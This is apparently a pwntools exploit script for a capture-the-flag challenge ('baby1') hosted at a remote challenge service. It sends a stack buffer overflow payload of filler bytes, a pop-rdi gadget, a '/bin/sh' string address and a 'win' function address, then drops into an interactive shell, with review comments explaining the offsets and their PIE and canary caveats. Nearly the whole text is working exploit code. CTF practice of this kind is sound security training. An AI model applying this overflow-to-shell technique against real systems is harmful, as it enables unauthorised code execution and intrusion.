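from pwn import *

# Remote challenge service and a local copy of the challenge binary.
r = remote('baby-01.pwn.beer', 10001)
e = ELF('./baby1')

# Address of the first "/bin/sh" byte string found in the loaded ELF.
# The builtin next() with a bytes needle works on Python 2 and Python 3;
# the original generator method .next() exists only on Python 2.
binsh = next(e.search(b"/bin/sh"))

# NOTE(review): hard-coded code address, presumably a `pop rdi; ret` gadget
# in baby1 -- confirm against the binary. A fixed address is only valid when
# the local ./baby1 matches the remote build and the binary is not
# position-independent (PIE); otherwise this value is stale.
pr = 0x0000000000400793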
# Short aliases around the connection object `r`; each one forwards its
# arguments unchanged and returns whatever the underlying tube method returns.
def ru(a):
    """Receive from `r` until `a` has been seen."""
    return r.recvuntil(a)


def sl(a):
    """Send `a` to `r` as one line."""
    return r.sendline(a)


def sla(a, b):
    """Wait for `a` on `r`, then send `b` as one line."""
    return r.sendlineafter(a, b)


def ex():
    """Switch the connection `r` to interactive mode."""
    return r.interactive()
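# Payload layout, each address packed to 8 bytes with p64:
#   0x18 filler bytes | pr | binsh | address of the `win` symbol
# NOTE(review): presumably the 0x18 filler bytes reach the saved return
# address of the vulnerable function, so that `win` is entered with the
# "/bin/sh" address as its first argument -- confirm against the binary.
# This layout depends on a fixed offset and fixed addresses; a stack canary
# or a PIE build of the target would invalidate it.
#
# Bytes literals keep the concatenation valid on Python 3, where
# str + bytes raises TypeError; on Python 2 they are identical to str.
p = b"A" * 0x18
p += p64(pr)
p += p64(binsh)
p += p64(e.symbols['win'])

# Order kept from the original: the line is sent first, then the script
# waits for the "input: " prompt text before going interactive.
sl(p)
ru(b"input: ")
ex()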